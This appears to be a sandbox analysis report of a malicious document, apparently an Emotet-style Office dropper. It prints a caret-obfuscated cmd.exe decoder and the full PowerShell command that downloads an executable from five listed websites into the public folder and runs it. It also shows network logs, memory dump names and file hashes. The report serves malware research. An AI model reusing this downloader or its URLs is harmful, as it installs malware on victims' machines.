^:2^W^M^p^]^s^J^t^_^'^b^t^.^s^p^h^,%^0^@^?n^>^J^s^;^g^b^3^F^4^p^z^w/v^#^;^1J^{^\^8^x^,CV^l^T-^=^d^X^]^d^w^\^K^H/^q^[^5^e^i^}^,^d^&^m^@^.^~n^>^d^z^.Nn^X%^ha^>aC^t^h^}:^s^KV^u^o^W^&^lt/^:r^o^{v^-^h^|^@^7^p^u^>^E^.^B(^T^w^Y^b^P^w^]5I^w^1^Pn/^`^Z^8/^{^X^i^:r^e^f^p^F^]^#^tn7N^t^P^pC^h^sk^x@^Z^=^6^I^Q^b^O^3^l^q^*N^O^8^\^K^4?^0^a^l^3^.^6^A^5/^x^\^o^5^7^+^X^h^h^.^B^*/^d4^<o^t^O^;r^])^F^.H^P^ie^I^s^:^u^x^H^E^q^|^K^A^i^Y/^E^f^[^>V^i^J^F^on^O^{^Y^i^2^9^S^a^M^u^`r^?^8^p^t^w^?^q^.{^P^A^wd^#r^w^u^}^$^w^W^s^o/^m^`^u/^e^1^{^:^L^pr^p^&^FY^t^Y^@^k^t^D^0^?h^9^]8^@@^5^sv^;^5^E^d^Y^U^|^P^WN^2^U^q^h^4^uC^=^?^O^`^wN^p^\^I^.^3h^A^G^1^K^S^H/^L^F^'^e^#^[^*^iR(^|^pR^Jr^t ^M^U^o^*^,^f^s^*^i^&/^>^a^-r^+%^Y^u^2^1^Qvv^x^2n^.6r^i^I^k^b^o^2^'^t^yc^U^4^t^2^m^J/^*^x^[^m^#^7^ ^o^*N^tc^s^}^m^.^I^EN^a^9^O^M^y^&N^tn^B^-^6^e^O^D^e^k^{^-C^s^.^M^p^d%bcn^Z^?^L^u^M^`^2^f^[^_^ar^J^?^}^i^|^qc^a^5^H^]^f^ R^B^.P^\a^w^D^GI^w^U%^u^w^{^_^}/^{^h^S/V^>^:^:^0^9^h^p^*^I^7^t+^G^~^t^y(^]^h^T^>^*^'^KV^9^=f^z{G^a^9^1^K^7^z*^ty^_^f^$i^A)^;^{^:^h^t~^\^`n^yv^Q^e^ ^j^d^i^Pc^?^lT^U^hC^F^A^4^b^K^@^\^e^Z^g^A^WcC^Q^.(^+^L^t^{^DW^e^[^5^mN)^g^f^ ^4i^Qt^[^\^*c^8^h^:^e^p^sV^j^}c^A^b^.^6ro^[^,^a^-~^h^]^wf^P^~^e^]^K^wnzR^Z=^X^}nn^l^3^s^b^wC^=^E^o^O^@^$^g^{^*^ ^j^b^wlC^|^4^l^,^z^A^e^1^_Qh^6^;^d^s^+)^hr{I^e^e^Xx^b^wN^]^xo^o^+^q^p&&^f^or /^L %^h ^in (^1^6^1^5^,^-^4^,^3)^d^o ^s^e^t ^F^0^Y^g=!^F^0^Y^g!!^f^i:~%^h,1!&&^i^f %^h=^=^3 c^a^l^l %^F^0^Y^g:^~^6%"###
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $Ebn=new-object Net.WebClient;$tKG='http://www.fairfundskenya.com/tyoinvur/sotpie/13pOuUPdv@http://www.trainifique.ro/h7x6aKN3I@http://www.photostand.de/wdlxJvpbJ@http://abdullahsheikh.info/KN3C4IO@http://lamsanviet.com/8wdaoHMFq'.Split('@');$IKM = '134';$qzc=$env:public+'\'+$IKM+'.exe';foreach($fdj in $tKG){try{$Ebn.DownloadFile($fdj, $qzc);Invoke-Item $qzc;break;}catch{}} ###
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.fairfundskenya.com | udp |
| US | 8.8.8.8:53 | www.trainifique.ro | udp |
| US | 185.199.111.153:80 | www.trainifique.ro | tcp |
| US | 8.8.8.8:53 | trainifique.ro | udp |
| US | 185.199.110.153:443 | trainifique.ro | tcp |
| US | 185.199.110.153:443 | trainifique.ro | tcp |
| US | 8.8.8.8:53 | www.photostand.de | udp |
| DE | 81.169.145.165:80 | www.photostand.de | tcp |
| DE | 81.169.145.165:443 | www.photostand.de | tcp |
| DE | 81.169.145.165:443 | www.photostand.de | tcp |
| US | 8.8.8.8:53 | abdullahsheikh.info | udp |
| US | 8.8.8.8:53 | lamsanviet.com | udp |
| IN | 193.203.163.237:80 | lamsanviet.com | tcp |
| IN | 193.203.163.237:443 | lamsanviet.com | tcp |
| IN | 193.203.163.237:443 | lamsanviet.com | tcp |
Files
memory/2852-0-0x000000002FF41000-0x000000002FF42000-memory.dmp
memory/2852-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2852-2-0x000000007126D000-0x0000000071278000-memory.dmp
memory/2852-7-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-19-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-18-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-124-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-112-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-100-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-87-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-75-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-62-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-31-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-27-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-17-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-15-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-14-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-13-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-12-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-11-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-10-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-9-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-6-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-131-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-59-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-51-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-16-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-8-0x00000000007E0000-0x00000000008E0000-memory.dmp
memory/2852-139-0x000000007126D000-0x0000000071278000-memory.dmp
memory/2852-140-0x00000000007E0000-0x00000000008E0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | f12a471b7b2639f1e13bc02a74e8c0ac |
| SHA1 | ec0fbd1646708eb37027cdf4fa6dc04143f4a6e0 |
| SHA256 | 90766f139ea4a8e9d5cdd7f9dd028eb7cf88cb8fb755f5e6da57dd06281c1380 |
| SHA512 | d7c98e22377ab96be371f5a162c2ab35afc153f3651b8534c1f618b9bcbdcb7e7da0cce94545f8262d68ab70c163769ec2d6ff69ffd7585da1655944c876e901 |
memory/2852-156-0x000000007126D000-0x0000000071278000-memory.dmp